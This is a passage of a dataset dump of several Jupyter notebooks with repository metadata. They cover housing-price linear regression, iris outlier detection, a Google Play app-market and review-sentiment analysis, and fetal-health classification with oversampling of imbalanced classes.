"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
]
] |
cb02947fc0bdb76e5b7bf79ecf4b6055f267f2c0 | 74,908 | ipynb | Jupyter Notebook | 01-Linear Regression with Python.ipynb | AhmetTuranBalkan/ML-Algorithms | aa72ce43e88689ef1425f09bc9c2519a03170165 | [
"MIT"
] | 1 | 2018-12-13T08:11:52.000Z | 2018-12-13T08:11:52.000Z | 01-Linear Regression with Python.ipynb | AhmetTuranBalkan/ML-Algorithms | aa72ce43e88689ef1425f09bc9c2519a03170165 | [
"MIT"
] | null | null | null | 01-Linear Regression with Python.ipynb | AhmetTuranBalkan/ML-Algorithms | aa72ce43e88689ef1425f09bc9c2519a03170165 | [
"MIT"
] | 3 | 2020-04-22T11:50:06.000Z | 2021-05-19T12:20:14.000Z | 124.431894 | 44,096 | 0.837227 | [
[
[
"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n%matplotlib inline",
"_____no_output_____"
],
[
"df = pd.read_csv('USA_Housing.csv')\n# The dataset is taken from Kaggle. The specific URL is https://www.kaggle.com/vedavyasv/usa-housing",
"_____no_output_____"
],
[
"sns.heatmap(df.corr() ,annot =True)",
"_____no_output_____"
],
[
"df.head()",
"_____no_output_____"
],
[
"df.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 5000 entries, 0 to 4999\nData columns (total 7 columns):\nAvg. Area Income 5000 non-null float64\nAvg. Area House Age 5000 non-null float64\nAvg. Area Number of Rooms 5000 non-null float64\nAvg. Area Number of Bedrooms 5000 non-null float64\nArea Population 5000 non-null float64\nPrice 5000 non-null float64\nAddress 5000 non-null object\ndtypes: float64(6), object(1)\nmemory usage: 273.5+ KB\n"
],
[
"df.describe()",
"_____no_output_____"
],
[
"df.columns",
"_____no_output_____"
],
[
"X = df[['Avg. Area Income', 'Avg. Area House Age', 'Avg. Area Number of Rooms',\n 'Avg. Area Number of Bedrooms', 'Area Population']]\ny = df['Price']",
"_____no_output_____"
],
[
"from sklearn.model_selection import train_test_split",
"_____no_output_____"
],
[
"X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.4, random_state=101)",
"_____no_output_____"
]
],
[
[
"## Creating and Training the Model",
"_____no_output_____"
]
],
[
[
"from sklearn.linear_model import LinearRegression",
"_____no_output_____"
],
[
"lm = LinearRegression()",
"_____no_output_____"
],
[
"lm.fit(X_train,y_train)",
"_____no_output_____"
]
],
[
[
"## Model Evaluation\n\n",
"_____no_output_____"
]
],
[
[
"coeff_df = pd.DataFrame(lm.coef_,X.columns,columns=['Coefficient'])\ncoeff_df",
"_____no_output_____"
],
[
"predictions = lm.predict(X_test)\nplt.scatter(y_test,predictions)\nplt.show()",
"_____no_output_____"
],
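[
"# Added sketch (not part of the original notebook): the model's R^2 on the test set is a quick,\n# hedged complement to the error metrics computed below.\nprint('R^2 on test data:', lm.score(X_test, y_test))",
"_____no_output_____"
],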
[
"from sklearn import metrics",
"_____no_output_____"
],
[
"print('MAE:', metrics.mean_absolute_error(y_test, predictions))\nprint('MSE:', metrics.mean_squared_error(y_test, predictions))\nprint('RMSE:', np.sqrt(metrics.mean_squared_error(y_test, predictions)))",
"MAE: 82288.2225191\nMSE: 10460958907.2\nRMSE: 102278.829223\n"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
]
] |
cb029e6916d5bbd0963c214d0a1b51e49e2d712e | 51,322 | ipynb | Jupyter Notebook | Pt_1/05_08_Extreme_value_analysis_using_univariate_methods/05_08_end.ipynb | vladcuevas/Python-Data-Science-Labs | eb7b2fa94402f396ed6fd5d4de62f89f930da458 | [
"MIT"
] | null | null | null | Pt_1/05_08_Extreme_value_analysis_using_univariate_methods/05_08_end.ipynb | vladcuevas/Python-Data-Science-Labs | eb7b2fa94402f396ed6fd5d4de62f89f930da458 | [
"MIT"
] | null | null | null | Pt_1/05_08_Extreme_value_analysis_using_univariate_methods/05_08_end.ipynb | vladcuevas/Python-Data-Science-Labs | eb7b2fa94402f396ed6fd5d4de62f89f930da458 | [
"MIT"
] | null | null | null | 250.35122 | 36,400 | 0.653209 | [
[
[
"# Chapter 5 - Outlier Analysis\n## Segment 8 - Extreme value analysis using univariate methods",
"_____no_output_____"
]
],
[
[
"import numpy as np\nimport pandas as pd\n\nimport matplotlib.pyplot as plt\nfrom pylab import rcParams",
"_____no_output_____"
],
[
"%matplotlib inline\nrcParams['figure.figsize'] = 5,4",
"_____no_output_____"
],
[
"import pathlib\nimport os\naddress = pathlib.Path(os.getcwd()).parent\naddress = pathlib.Path(os.path.join(address, 'Data/iris.data.csv'))",
"_____no_output_____"
],
[
"df = pd.read_csv(filepath_or_buffer=address, header=None, sep=',')\n\ndf.columns=['Sepal Length','Sepal Width','Petal Length','Petal Width', 'Species']",
"_____no_output_____"
],
[
"X = df.iloc[:,0:4].values\ny = df.iloc[:,4].values\ndf[:5]",
"_____no_output_____"
]
],
[
[
"### Identifying outliers from Tukey boxplots",
"_____no_output_____"
]
],
[
[
"df.boxplot(return_type='dict')\nplt.plot()",
"_____no_output_____"
],
[
"Sepal_Width = X[:,1]\niris_outliers = (Sepal_Width > 4)\ndf[iris_outliers]",
"_____no_output_____"
],
[
"Sepal_Width = X[:,1]\niris_outliers = (Sepal_Width < 2.05)\ndf[iris_outliers]",
"_____no_output_____"
]
],
[
[
"### Applying Tukey outlier labeling",
"_____no_output_____"
]
],
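[
[
"# Added sketch (assumption, not part of the original notebook): Tukey's rule labels points outside\n# [Q1 - 1.5*IQR, Q3 + 1.5*IQR] as suspected outliers. Computing the fences for Sepal Width makes the\n# thresholds used above (roughly 2.05 and 4.0) explicit.\nq1 = df['Sepal Width'].quantile(0.25)\nq3 = df['Sepal Width'].quantile(0.75)\niqr = q3 - q1\nprint('lower fence:', q1 - 1.5 * iqr)\nprint('upper fence:', q3 + 1.5 * iqr)",
"_____no_output_____"
]
],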
[
[
"pd.options.display.float_format = '{:.1f}'.format\nX_df = pd.DataFrame(X)\nprint(X_df.describe())",
"0 1 2 3\ncount 150.0 150.0 150.0 150.0\nmean 5.8 3.1 3.8 1.2\nstd 0.8 0.4 1.8 0.8\nmin 4.3 2.0 1.0 0.1\n25% 5.1 2.8 1.6 0.3\n50% 5.8 3.0 4.3 1.3\n75% 6.4 3.3 5.1 1.8\nmax 7.9 4.4 6.9 2.5\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb029efc94bcfd0bc7f0c7c0f915bec3c637d7b1 | 613,806 | ipynb | Jupyter Notebook | App market.ipynb | Simonm952/simonm952.github.io | 745a36d8487a9caf9dc2e8d05f148581481db6c0 | [
"Unlicense"
] | null | null | null | App market.ipynb | Simonm952/simonm952.github.io | 745a36d8487a9caf9dc2e8d05f148581481db6c0 | [
"Unlicense"
] | null | null | null | App market.ipynb | Simonm952/simonm952.github.io | 745a36d8487a9caf9dc2e8d05f148581481db6c0 | [
"Unlicense"
] | null | null | null | 306,903 | 613,805 | 0.751918 | [
[
[
"## 1. Google Play Store apps and reviews\n<p>Mobile apps are everywhere. They are easy to create and can be lucrative. Because of these two factors, more and more apps are being developed. In this notebook, we will do a comprehensive analysis of the Android app market by comparing over ten thousand apps in Google Play across different categories. We'll look for insights in the data to devise strategies to drive growth and retention.</p>\n<p><img src=\"https://assets.datacamp.com/production/project_619/img/google_play_store.png\" alt=\"Google Play logo\"></p>\n<p>Let's take a look at the data, which consists of two files:</p>\n<ul>\n<li><code>apps.csv</code>: contains all the details of the applications on Google Play. There are 13 features that describe a given app.</li>\n<li><code>user_reviews.csv</code>: contains 100 reviews for each app, <a href=\"https://www.androidpolice.com/2019/01/21/google-play-stores-redesigned-ratings-and-reviews-section-lets-you-easily-filter-by-star-rating/\">most helpful first</a>. The text in each review has been pre-processed and attributed with three new features: Sentiment (Positive, Negative or Neutral), Sentiment Polarity and Sentiment Subjectivity.</li>\n</ul>",
"_____no_output_____"
]
],
[
[
"# Read in dataset\nimport pandas as pd\napps_with_duplicates = pd.read_csv('datasets/apps.csv')\n\n# Drop duplicates\napps = apps_with_duplicates.drop_duplicates()\n\n# Print the total number of apps\nprint('Total number of apps in the dataset = ', apps.shape[0])\n\n# Have a look at a random sample of 5 entries\nn = 5\napps.sample(n)\n",
"Total number of apps in the dataset = 9659\n"
]
],
[
[
"## 2. Data cleaning\n<p>The four features that we will be working with most frequently henceforth are <code>Installs</code>, <code>Size</code>, <code>Rating</code> and <code>Price</code>. The <code>info()</code> function (from the previous task) told us that <code>Installs</code> and <code>Price</code> columns are of type <code>object</code> and not <code>int64</code> or <code>float64</code> as we would expect. This is because the column contains some characters more than just [0,9] digits. Ideally, we would want these columns to be numeric as their name suggests. <br>\nHence, we now proceed to data cleaning and prepare our data to be consumed in our analyis later. Specifically, the presence of special characters (<code>, $ +</code>) in the <code>Installs</code> and <code>Price</code> columns make their conversion to a numerical data type difficult.</p>",
"_____no_output_____"
]
],
[
[
"# List of characters to remove\nchars_to_remove = ['+',\",\",\"$\"]\n# List of column names to clean\ncols_to_clean = [\"Installs\",\"Price\"]\n\n# Loop for each column\nfor col in cols_to_clean:\n # Replace each character with an empty string\n for char in chars_to_remove:\n apps[col] = apps[col].astype(str).str.replace(char, '')\n # Convert col to numeric\n apps[col] = pd.to_numeric( apps[col]) ",
"_____no_output_____"
]
],
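[
[
"# Added sketch (not part of the original project): a quick, hedged sanity check that the cleaned\n# columns are now numeric, so the analysis below can treat them as numbers.\nprint(apps[['Installs', 'Price']].dtypes)\napps[['Installs', 'Price']].describe()",
"_____no_output_____"
]
],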
[
[
"## 3. Exploring app categories\n<p>With more than 1 billion active users in 190 countries around the world, Google Play continues to be an important distribution platform to build a global audience. For businesses to get their apps in front of users, it's important to make them more quickly and easily discoverable on Google Play. To improve the overall search experience, Google has introduced the concept of grouping apps into categories.</p>\n<p>This brings us to the following questions:</p>\n<ul>\n<li>Which category has the highest share of (active) apps in the market? </li>\n<li>Is any specific category dominating the market?</li>\n<li>Which categories have the fewest number of apps?</li>\n</ul>\n<p>We will see that there are <code>33</code> unique app categories present in our dataset. <em>Family</em> and <em>Game</em> apps have the highest market prevalence. Interestingly, <em>Tools</em>, <em>Business</em> and <em>Medical</em> apps are also at the top.</p>",
"_____no_output_____"
]
],
[
[
"import plotly\nplotly.offline.init_notebook_mode(connected=True)\nimport plotly.graph_objs as go\n\n# Print the total number of unique categories\nnum_categories = len(apps[\"Category\"].unique())\nprint('Number of categories = ', num_categories)\n\n# Count the number of apps in each 'Category' and sort them in descending order\nnum_apps_in_category = apps[\"Category\"].value_counts().sort_values(ascending = False)\n\ndata = [go.Bar(\n x = num_apps_in_category.index, # index = category name\n y = num_apps_in_category.values, # value = count\n)]\n\nplotly.offline.iplot(data)",
"_____no_output_____"
]
],
[
[
"## 4. Distribution of app ratings\n<p>After having witnessed the market share for each category of apps, let's see how all these apps perform on an average. App ratings (on a scale of 1 to 5) impact the discoverability, conversion of apps as well as the company's overall brand image. Ratings are a key performance indicator of an app.</p>\n<p>From our research, we found that the average volume of ratings across all app categories is <code>4.17</code>. The histogram plot is skewed to the right indicating that the majority of the apps are highly rated with only a few exceptions in the low-rated apps.</p>",
"_____no_output_____"
]
],
[
[
"# Average rating of apps\navg_app_rating = apps['Rating'].mean()\nprint('Average app rating = ', avg_app_rating)\n\n# Distribution of apps according to their ratings\ndata = [go.Histogram(\n x = apps['Rating']\n)]\n\n# Vertical dashed line to indicate the average app rating\nlayout = {'shapes': [{\n 'type' :'line',\n 'x0': avg_app_rating,\n 'y0': 0,\n 'x1': avg_app_rating,\n 'y1': 1000,\n 'line': { 'dash': 'dashdot'}\n }]\n }\n\nplotly.offline.iplot({'data': data, 'layout': layout})",
"Average app rating = 4.173243045387994\n"
]
],
[
[
"## 5. Size and price of an app\n<p>Let's now examine app size and app price. For size, if the mobile app is too large, it may be difficult and/or expensive for users to download. Lengthy download times could turn users off before they even experience your mobile app. Plus, each user's device has a finite amount of disk space. For price, some users expect their apps to be free or inexpensive. These problems compound if the developing world is part of your target market; especially due to internet speeds, earning power and exchange rates.</p>\n<p>How can we effectively come up with strategies to size and price our app?</p>\n<ul>\n<li>Does the size of an app affect its rating? </li>\n<li>Do users really care about system-heavy apps or do they prefer light-weighted apps? </li>\n<li>Does the price of an app affect its rating? </li>\n<li>Do users always prefer free apps over paid apps?</li>\n</ul>\n<p>We find that the majority of top rated apps (rating over 4) range from 2 MB to 20 MB. We also find that the vast majority of apps price themselves under \\$10.</p>",
"_____no_output_____"
]
],
[
[
"%matplotlib inline\nimport seaborn as sns\nsns.set_style(\"darkgrid\")\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n# Filter rows where both Rating and Size values are not null\napps_with_size_and_rating_present = apps[(~apps[\"Rating\"].isnull()) & (~apps[\"Size\"].isnull())]\n\n# Subset for categories with at least 250 apps\nlarge_categories = apps_with_size_and_rating_present.groupby(\"Category\").filter(lambda x: len(x) >= 250).reset_index()\n\n# Plot size vs. rating\nplt1 = sns.jointplot(x = large_categories[\"Size\"], y = large_categories[\"Rating\"], kind = 'hex')\n\n# Subset apps whose 'Type' is 'Paid'\npaid_apps = apps_with_size_and_rating_present[apps_with_size_and_rating_present[\"Type\"] == \"Paid\"]\n\n# Plot price vs. rating\nplt2 = sns.jointplot(x = paid_apps[\"Price\"], y = paid_apps[\"Rating\"])",
"_____no_output_____"
]
],
[
[
"## 6. Relation between app category and app price\n<p>So now comes the hard part. How are companies and developers supposed to make ends meet? What monetization strategies can companies use to maximize profit? The costs of apps are largely based on features, complexity, and platform.</p>\n<p>There are many factors to consider when selecting the right pricing strategy for your mobile app. It is important to consider the willingness of your customer to pay for your app. A wrong price could break the deal before the download even happens. Potential customers could be turned off by what they perceive to be a shocking cost, or they might delete an app they’ve downloaded after receiving too many ads or simply not getting their money's worth.</p>\n<p>Different categories demand different price ranges. Some apps that are simple and used daily, like the calculator app, should probably be kept free. However, it would make sense to charge for a highly-specialized medical app that diagnoses diabetic patients. Below, we see that <em>Medical and Family</em> apps are the most expensive. Some medical apps extend even up to \\$80! All game apps are reasonably priced below \\$20.</p>",
"_____no_output_____"
]
],
[
[
"import matplotlib.pyplot as plt\nfig, ax = plt.subplots()\nfig.set_size_inches(15, 8)\n\n# Select a few popular app categories\npopular_app_cats = apps[apps.Category.isin(['GAME', 'FAMILY', 'PHOTOGRAPHY',\n 'MEDICAL', 'TOOLS', 'FINANCE',\n 'LIFESTYLE','BUSINESS'])]\n\n# Examine the price trend by plotting Price vs Category\nax = sns.stripplot(x = popular_app_cats[\"Price\"], y = popular_app_cats[\"Category\"], jitter=True, linewidth=1)\nax.set_title('App pricing trend across categories')\n\n# Apps whose Price is greater than 200\napps_above_200 = popular_app_cats[['Category', 'App', 'Price']][popular_app_cats[\"Price\"] > 200]\napps_above_200",
"_____no_output_____"
]
],
[
[
"## 7. Filter out \"junk\" apps\n<p>It looks like a bunch of the really expensive apps are \"junk\" apps. That is, apps that don't really have a purpose. Some app developer may create an app called <em>I Am Rich Premium</em> or <em>most expensive app (H)</em> just for a joke or to test their app development skills. Some developers even do this with malicious intent and try to make money by hoping people accidentally click purchase on their app in the store.</p>\n<p>Let's filter out these junk apps and re-do our visualization. The distribution of apps under \\$20 becomes clearer.</p>",
"_____no_output_____"
]
],
[
[
"# Select apps priced below $100\napps_under_100 =popular_app_cats[popular_app_cats[\"Price\"]<100]\n\nfig, ax = plt.subplots()\nfig.set_size_inches(15, 8)\n\n# Examine price vs category with the authentic apps\nax = sns.stripplot(x=apps_under_100[\"Price\"], y=apps_under_100[\"Category\"], data=apps_under_100,\n jitter=True, linewidth=1)\nax.set_title('App pricing trend across categories after filtering for junk apps')",
"_____no_output_____"
]
],
[
[
"## 8. Popularity of paid apps vs free apps\n<p>For apps in the Play Store today, there are five types of pricing strategies: free, freemium, paid, paymium, and subscription. Let's focus on free and paid apps only. Some characteristics of free apps are:</p>\n<ul>\n<li>Free to download.</li>\n<li>Main source of income often comes from advertisements.</li>\n<li>Often created by companies that have other products and the app serves as an extension of those products.</li>\n<li>Can serve as a tool for customer retention, communication, and customer service.</li>\n</ul>\n<p>Some characteristics of paid apps are:</p>\n<ul>\n<li>Users are asked to pay once for the app to download and use it.</li>\n<li>The user can't really get a feel for the app before buying it.</li>\n</ul>\n<p>Are paid apps installed as much as free apps? It turns out that paid apps have a relatively lower number of installs than free apps, though the difference is not as stark as I would have expected!</p>",
"_____no_output_____"
]
],
[
[
"trace0 = go.Box(\n # Data for paid apps\n y=apps[apps['Type'] == 'Paid']['Installs'],\n name = 'Paid'\n)\n\ntrace1 = go.Box(\n # Data for free apps\n y=apps[apps['Type'] == 'Free']['Installs'],\n name = 'Free'\n)\n\nlayout = go.Layout(\n title = \"Number of downloads of paid apps vs. free apps\",\n yaxis = dict(\n type = 'log',\n autorange = True\n )\n)\n\n# Add trace0 and trace1 to a list for plotting\ndata = [trace0,trace1]\nplotly.offline.iplot({'data': data, 'layout': layout})",
"_____no_output_____"
]
],
[
[
"## 9. Sentiment analysis of user reviews\n<p>Mining user review data to determine how people feel about your product, brand, or service can be done using a technique called sentiment analysis. User reviews for apps can be analyzed to identify if the mood is positive, negative or neutral about that app. For example, positive words in an app review might include words such as 'amazing', 'friendly', 'good', 'great', and 'love'. Negative words might be words like 'malware', 'hate', 'problem', 'refund', and 'incompetent'.</p>\n<p>By plotting sentiment polarity scores of user reviews for paid and free apps, we observe that free apps receive a lot of harsh comments, as indicated by the outliers on the negative y-axis. Reviews for paid apps appear never to be extremely negative. This may indicate something about app quality, i.e., paid apps being of higher quality than free apps on average. The median polarity score for paid apps is a little higher than free apps, thereby syncing with our previous observation.</p>\n<p>In this notebook, we analyzed over ten thousand apps from the Google Play Store. We can use our findings to inform our decisions should we ever wish to create an app ourselves.</p>",
"_____no_output_____"
]
],
[
[
"# Load user_reviews.csv\nreviews_df = pd.read_csv('datasets/user_reviews.csv')\n\n# Join and merge the two dataframe\nmerged_df = pd.merge(apps, reviews_df, on = 'App', how = \"inner\")\n\n# Drop NA values from Sentiment and Translated_Review columns\nmerged_df = merged_df.dropna(subset=['Sentiment', 'Translated_Review'])\n\nsns.set_style('ticks')\nfig, ax = plt.subplots()\nfig.set_size_inches(11, 8)\n\n# User review sentiment polarity for paid vs. free apps\nax = sns.boxplot(x = 'Type', y = 'Sentiment_Polarity', data = merged_df)\nax.set_title('Sentiment Polarity Distribution')",
"_____no_output_____"
],
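[
"# Added sketch (not part of the original project): a hedged numeric check of the observation above -\n# the median sentiment polarity per app type, computed directly from the merged reviews.\nmerged_df.groupby('Type')['Sentiment_Polarity'].median()",
"_____no_output_____"
],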
[
"reviews_df",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
cb02a74d19e76e76af3ef741404192714eff98ee | 592,173 | ipynb | Jupyter Notebook | Notebooks/FetalHealthClassification_Imbalanced.ipynb | codeshruti/HealthCheck | 3e1579991ba9574eae0441f9597e06cd434c83c5 | [
"MIT"
] | 1 | 2021-03-15T10:43:42.000Z | 2021-03-15T10:43:42.000Z | Notebooks/FetalHealthClassification_Imbalanced.ipynb | codeshruti/HealthCheck | 3e1579991ba9574eae0441f9597e06cd434c83c5 | [
"MIT"
] | null | null | null | Notebooks/FetalHealthClassification_Imbalanced.ipynb | codeshruti/HealthCheck | 3e1579991ba9574eae0441f9597e06cd434c83c5 | [
"MIT"
] | null | null | null | 176.294433 | 354,514 | 0.811143 | [
[
[
"<center>\r\n <h1>Fetal Health Classification</h1>\r\n <img src=\"https://blog.pregistry.com/wp-content/uploads/2018/08/AdobeStock_90496738.jpeg\">\r\n <small>Source: Google</small>\r\n</center>\r\n\r\n <p>\r\n Fetal mortality refers to stillbirths or fetal death. It encompasses any death of a fetus after 20 weeks of gestation.\r\n\r\n Cardiotocograms (CTGs) are a simple and cost accessible option to assess fetal health, allowing healthcare professionals to take action in order to prevent child and maternal mortality.\r\n \r\n Cardiotocography is a technical means of recording the fetal heartbeat and the uterine contractions during pregnancy. It is most commonly used in the third trimester and its purpose is to monitor fetal well-being and allow early detection of fetal distress. An abnormal CTG may indicate the need for further investigations and potential intervention.\r\n </p>",
"_____no_output_____"
]
],
[
[
"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns",
"_____no_output_____"
],
[
"df = pd.read_csv('../Datasets/fetal_health.csv')",
"_____no_output_____"
]
],
[
[
"| Variable symbol |\tVariable description|\r\n| ----------------|---------------------|\r\n|LB\t| Fetal heart rate baseline (beats per minute)|\r\n|AC\t| Number of accelerations per second|\r\n|FM\t| Number of fetal movements per second|\r\n|UC\t| Number of uterine contractions per second|\r\n|DL\t| Number of light decelerations per second|\r\n|DS\t| Number of severe decelerations per second|\r\n|DP\t| Number of prolonged decelerations per second|\r\n|ASTV\t| Percentage of time with abnormal short-term variability|\r\n|MSTV\t| Mean value of short-term variability|\r\n|ALTV\t| Percentage of time with abnormal long-term variability|\r\n|MLTV\t| Mean value of long-term variability|\r\n|Width\t| Width of FHR histogram|\r\n|Min\t| Minimum of FHR histogram|\r\n|Max\t| Maximum of FHR histogram|\r\n|Nmax\t| Number of histogram peaks|\r\n|Nzeros\t| Number of histogram zeroes|\r\n|Mode\t| Histogram mode|\r\n|Median\t| Histogram median|\r\n|Variance\t| Histogram variance|\r\n|Tendency |\tHistogram tendency|\r\n|NSP\t| Fetal state class code (N=Normal, S=Suspected,P=Pathological)|\r\n",
"_____no_output_____"
],
[
"Reference: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC6822315/\r\n",
"_____no_output_____"
]
],
[
[
"df.head()",
"_____no_output_____"
],
[
"df.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 2126 entries, 0 to 2125\nData columns (total 22 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 baseline value 2126 non-null float64\n 1 accelerations 2126 non-null float64\n 2 fetal_movement 2126 non-null float64\n 3 uterine_contractions 2126 non-null float64\n 4 light_decelerations 2126 non-null float64\n 5 severe_decelerations 2126 non-null float64\n 6 prolongued_decelerations 2126 non-null float64\n 7 abnormal_short_term_variability 2126 non-null float64\n 8 mean_value_of_short_term_variability 2126 non-null float64\n 9 percentage_of_time_with_abnormal_long_term_variability 2126 non-null float64\n 10 mean_value_of_long_term_variability 2126 non-null float64\n 11 histogram_width 2126 non-null float64\n 12 histogram_min 2126 non-null float64\n 13 histogram_max 2126 non-null float64\n 14 histogram_number_of_peaks 2126 non-null float64\n 15 histogram_number_of_zeroes 2126 non-null float64\n 16 histogram_mode 2126 non-null float64\n 17 histogram_mean 2126 non-null float64\n 18 histogram_median 2126 non-null float64\n 19 histogram_variance 2126 non-null float64\n 20 histogram_tendency 2126 non-null float64\n 21 fetal_health 2126 non-null float64\ndtypes: float64(22)\nmemory usage: 365.5 KB\n"
],
[
"df.describe()",
"_____no_output_____"
],
[
"df.isna().sum()",
"_____no_output_____"
]
],
[
[
"Thankfully, there are no NaN values in the dataset.",
"_____no_output_____"
]
],
[
[
"sns.countplot(x='fetal_health', data=df)\r\nprint(df['fetal_health'].value_counts())",
"1.0 1655\n2.0 295\n3.0 176\nName: fetal_health, dtype: int64\n"
]
],
[
[
"We can see that there is the problem of class imbalance in this dataset. This means we cannot use **accuracy** as a metric to evaluate the performance of our model. More appropriate metrics for model evaluation are:\r\n1. F1 Score\r\n2. Recall\r\n3. Precision",
"_____no_output_____"
],
[
"Before diving deep into understanding the data and features, let us first look at what the three different categories of fetal_health represent. Please refer to the table below for the same.\r\n\r\nReference: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC4812878/",
"_____no_output_____"
],
[
"",
"_____no_output_____"
]
],
[
[
"corr = df.corr()\r\n\r\nplt.figure(figsize=(24, 20))\r\nsns.heatmap(corr, annot=True)\r\nplt.title(\"Correlation Matrix\")\r\nplt.show()",
"_____no_output_____"
]
],
[
[
"From the above correlation matrix, we can observe that the following features show some correlation with target variable fetal health:\r\n\r\n1. accelerations (negative corr)\r\n2. uterine contractions (negative corr)\r\n3. prolonged_decelerations (positive corr)\r\n4. abnormal short term variability (positive corr)\r\n5. percentage of time with abnormal long term variability (positive corr)\r\n\r\n",
"_____no_output_____"
],
[
"## Model Selection",
"_____no_output_____"
]
],
[
[
"from sklearn.model_selection import train_test_split, GridSearchCV\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier\r\nfrom sklearn.svm import LinearSVC\r\nfrom sklearn.linear_model import SGDClassifier\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.metrics import classification_report, f1_score, recall_score, precision_score",
"_____no_output_____"
],
[
"print(\"There are total \"+str(len(df))+\" rows in the dataset\")",
"There are total 2126 rows in the dataset\n"
],
[
"X = df.drop([\"fetal_health\"],axis=1)\r\nY = df[\"fetal_health\"]",
"_____no_output_____"
],
[
"std_scale = StandardScaler()\r\nX_sc = std_scale.fit_transform(X)",
"_____no_output_____"
],
[
"X_train, X_test, y_train,y_test = train_test_split(X_sc, Y, test_size=0.25, random_state=42)\r\nprint(\"There are total \"+str(len(X_train))+\" rows in training dataset\")\r\nprint(\"There are total \"+str(len(X_test))+\" rows in test dataset\")",
"There are total 1594 rows in training dataset\nThere are total 532 rows in test dataset\n"
]
],
[
[
"If you remember, in the initial investigation of the data, we found out that we have imbalanced classes. \r\n\r\nTo handle the problem of imbalanced classes, we can use oversampling techniques. In oversampling, we populate the minority classes with some synthetic data. \r\n\r\nLet us try some oversampling techniques and judge their performance on the above dataset.",
"_____no_output_____"
],
[
"1. SMOTE Technique",
"_____no_output_____"
]
],
[
[
"from imblearn.over_sampling import SMOTE\r\nsmt = SMOTE()\r\nX_train_sm, y_train_sm = smt.fit_resample(X_train, y_train)",
"/usr/local/lib/python3.7/dist-packages/sklearn/externals/six.py:31: FutureWarning: The module is deprecated in version 0.21 and will be removed in version 0.23 since we've dropped support for Python 2.7. Please rely on the official version of six (https://pypi.org/project/six/).\n \"(https://pypi.org/project/six/).\", FutureWarning)\n/usr/local/lib/python3.7/dist-packages/sklearn/utils/deprecation.py:144: FutureWarning: The sklearn.neighbors.base module is deprecated in version 0.22 and will be removed in version 0.24. The corresponding classes / functions should instead be imported from sklearn.neighbors. Anything that cannot be imported from sklearn.neighbors is now part of the private API.\n warnings.warn(message, FutureWarning)\n/usr/local/lib/python3.7/dist-packages/sklearn/utils/deprecation.py:87: FutureWarning: Function safe_indexing is deprecated; safe_indexing is deprecated in version 0.22 and will be removed in version 0.24.\n warnings.warn(msg, category=FutureWarning)\n/usr/local/lib/python3.7/dist-packages/sklearn/utils/deprecation.py:87: FutureWarning: Function safe_indexing is deprecated; safe_indexing is deprecated in version 0.22 and will be removed in version 0.24.\n warnings.warn(msg, category=FutureWarning)\n"
]
],
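[
[
"# Added sketch (assumption, not part of the original notebook): check the class distribution after SMOTE\r\n# to confirm that the minority classes were oversampled to match the majority class.\r\nfrom collections import Counter\r\nprint('Before SMOTE:', Counter(y_train))\r\nprint('After SMOTE: ', Counter(y_train_sm))",
"_____no_output_____"
]
],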
[
[
"2. ADASYN",
"_____no_output_____"
]
],
[
[
"from imblearn.over_sampling import ADASYN\r\nada = ADASYN(random_state=130)\r\nX_train_ada, y_train_ada = ada.fit_resample(X_train, y_train)",
"/usr/local/lib/python3.7/dist-packages/sklearn/utils/deprecation.py:87: FutureWarning: Function safe_indexing is deprecated; safe_indexing is deprecated in version 0.22 and will be removed in version 0.24.\n warnings.warn(msg, category=FutureWarning)\n/usr/local/lib/python3.7/dist-packages/sklearn/utils/deprecation.py:87: FutureWarning: Function safe_indexing is deprecated; safe_indexing is deprecated in version 0.22 and will be removed in version 0.24.\n warnings.warn(msg, category=FutureWarning)\n"
]
],
[
[
"3. SMOTE + Tomek Links",
"_____no_output_____"
]
],
[
[
"from imblearn.combine import SMOTETomek\r\nsmtom = SMOTETomek(random_state=139)\r\nX_train_smtom, y_train_smtom = smtom.fit_resample(X_train, y_train)",
